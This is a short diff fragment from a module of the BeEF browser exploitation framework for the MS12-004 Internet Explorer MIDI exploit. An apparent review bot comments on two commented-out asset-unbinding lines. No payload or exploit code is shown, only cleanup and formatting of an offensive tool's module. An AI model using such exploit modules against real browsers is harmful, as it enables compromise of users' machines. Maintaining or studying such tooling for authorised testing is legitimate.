save({'result' => @datastore['result']})
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.html')
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.mid')
save({ 'result' => @datastore['result'] })
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.html')
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.mid')
end
end
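Review bot: The two `AssetHandler.instance.unbind(...)` calls in `post_execute` are only re-indented and remain commented out, so the `.html` and `.mid` files that `pre_send` binds under `/ie_ms12_004_midi` are never released by this module and presumably stay served for the life of the server process. Commented-out code gives no hint which behaviour is intended, and a lint pass is a good moment to settle it. Either restore the cleanup, or delete the dead lines and state the reason in their place, for example `# Assets are left bound on purpose: the browser may still request them after post_execute.` if that is in fact why.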
